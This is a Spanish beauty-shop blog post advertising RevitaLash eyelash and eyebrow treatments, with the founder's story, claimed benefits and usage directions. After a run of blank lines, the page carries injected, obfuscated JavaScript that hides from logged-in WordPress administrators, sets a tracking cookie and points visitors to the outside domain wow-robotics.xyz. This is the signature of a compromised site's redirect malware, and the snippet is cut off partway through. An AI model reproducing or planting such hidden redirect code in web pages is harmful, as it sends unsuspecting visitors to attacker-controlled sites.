comprar revitalashHoy venimos a hablaros de un producto que ha revolucionado el mundo de la cosmética.

Se trata de un tratamiento que facilita el crecimiento natural de las pestañas de forma progresiva a lo largo de 4 semanas.

Michael Brinkenhoff, MD médico especializado en medicina oftalmológica y creador de este innovador tratamiento en el cual en su origen encontramos una historia enternecedora.

En 1988, la esposa del Dr. Brinkenhoff, Gayle, fue diagnosticada con cáncer de mama metastásico. Con el transcurso de su enfermedad Gayle atravesaba un difícil viaje físico y emocional, Michael sólo deseaba ayudar a su esposa a verse y sentirse más guapa y segura en sí misma.

Y así con esta bonita historia de fondo en 2006 nació la marca cosmética innovadora RevitaLash. Desde entonces, la marca RevitaLash se ha convertido en una línea completa de cosméticos de confianza diseñados para ayudar a mejorar la belleza natural.

En nuestra perfumería online encontraréis los dos productos más demandados de la marca, el tratamiento de pestañas (RevitaLash Advanced) y el tratamiento para cejas (RevitaBrow Advanced).

RevitaLash Advanced  es el producto más vendido que se ha convertido en tendencia actual en el mundo de la cosmética que contiene una mezcla patentada de ingredientes que ayudan al crecimiento de nuestras pestañas de una forma rápida y extraordinaria.

revitalash advanced

 

 

 

 

 

 

 

 

 

 

 

En su fórmula se combinan péptidos con infusiones botánicas consiguiendo una mezcla espectacular.

Pero, ¿Qué conseguimos con RevitaLash Advanced?

– Acondiciona nuestras pestañas para ayudar a protegerlas contra la fragilidad y las roturas.

– Ayuda a mejorar la flexibilidad, la humedad y el brillo de las pestañas.

– Ayuda a defender las pestañas de agresores externos diarios.

– Mejora la apariencia de las pestañas. Tras su uso las pestañas aparecen más largas, fuertes y saludables.

– Contiene el complejo BioPeptin Complex™ con péptidos y extractos botánicos que aportan a las pestañas humedad, manteniéndolas suaves, voluminosas y de aspecto saludable.

Sus resultados son visibles en 4 semanas, aunque en ocasiones incluso antes comenzamos a notar sus resultados.

¿Cómo se utiliza? Basta que nos apliquemos una pequeña línea de producto en la base de nuestras pestañas una vez al día justo antes de dormir.

¿Estáis listas para disfrutar de unas pestañas de infarto? ¿Qué os parece este producto os gustaría probarlo?

 

var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone